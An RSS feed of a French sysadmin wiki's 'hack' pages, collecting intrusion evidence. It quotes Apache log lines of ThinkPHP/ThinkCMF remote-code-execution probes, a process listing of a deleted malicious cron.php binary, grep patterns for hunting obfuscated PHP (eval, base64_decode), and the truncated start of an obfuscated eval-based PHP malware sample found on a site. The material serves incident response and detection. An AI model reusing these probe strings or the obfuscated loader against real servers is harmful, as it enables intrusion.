<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.8" -->
<?xml-stylesheet href="http://wiki.edmc73.com/lib/exe/css.php?s=feed" type="text/css"?>
<rss version="2.0">
    <channel xmlns:g="http://base.google.com/ns/1.0">
        <title>EDMC73.com - hack</title>
        <description></description>
        <link>http://wiki.edmc73.com/</link>
        <lastBuildDate>Tue, 02 Jun 2026 01:31:40 +0000</lastBuildDate>
        <generator>FeedCreator 1.8</generator>
        <image>
            <url>http://wiki.edmc73.com/_media/logo.png</url>
            <title>EDMC73.com</title>
            <link>http://wiki.edmc73.com/</link>
        </image>
        <item>
            <title>Apache</title>
            <link>http://wiki.edmc73.com/hack/apache?rev=1578471939&amp;do=diff</link>
            <description>Apache

Ce que l’on peut voir dans les logs apaches...


5.101.0.209 - - [07/Jan/2020:00:06:41 +0100] &quot;GET /?a=fetch&amp;content=&lt;php&gt;die(@md5(HelloThinkCMF))&lt;/php&gt; HTTP/1.1&quot; 302 1343 &quot;-&quot; &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36&quot;
5.101.0.209 - - [07/Jan/2020:00:11:18 +0100] &quot;GET /index.php?s=/Index/\\think\\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=md5&amp;vars[1][]=HelloThinkPHP HTTP/1.1&quot; 302 1389 &quot;-&quot; &quot;Mozilla/5.…</description>
            <author>anonymous@undisclosed.example.com (Anonymous)</author>
            <pubDate>Wed, 08 Jan 2020 08:25:39 +0000</pubDate>
        </item>
        <item>
            <title>exe</title>
            <link>http://wiki.edmc73.com/hack/exe?rev=1579816692&amp;do=diff</link>
            <description>exe

Cas d’un binaire exécutable qui tourne mais donc le fichier n’existe plus


# ps aux | grep cron
toto 25643  0.0  0.0 145924  1228 ?        S    09:01   0:01 ./cron.php -e0.0.0.0 -p31756

# ls -l /proc/25643/exe
lrwxrwxrwx 1 toto toto 0 janv. 23 22:51 /proc/25643/exe -&gt; /var/www/toto/plugins/xmap/com_mtree/cron.php (deleted)</description>
            <author>anonymous@undisclosed.example.com (Anonymous)</author>
            <pubDate>Thu, 23 Jan 2020 21:58:12 +0000</pubDate>
        </item>
        <item>
            <title>Rechercher</title>
            <link>http://wiki.edmc73.com/hack/rechercher?rev=1580936011&amp;do=diff</link>
            <description>Rechercher
# grep -rHin --color &#039;\\x&#039; --include \*.php *

# grep -rHin --color &#039;}function&#039; --include \*.php *

# grep -rHin --color &#039;eval(&#039; --include \*.php *
# grep -rHin --color &#039;eval (&#039; --include \*.php *

# grep -rHin --color &#039;base64_decode&#039; --include \*.php *</description>
            <author>anonymous@undisclosed.example.com (Anonymous)</author>
            <pubDate>Wed, 05 Feb 2020 20:53:31 +0000</pubDate>
        </item>
        <item>
            <title>Script1</title>
            <link>http://wiki.edmc73.com/hack/script1?rev=1579817708&amp;do=diff</link>
            <description>Script1

Exemple d’un script retrouvé sur un site


&lt;?php


eval(&quot;\n\$dgreusdi = intval(__LINE__) * 337;&quot;);

$a = &quot;7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWD…</description>
            <author>anonymous@undisclosed.example.com (Anonymous)</author>
            <pubDate>Thu, 23 Jan 2020 22:15:08 +0000</pubDate>
        </item>
    </channel>
</rss>
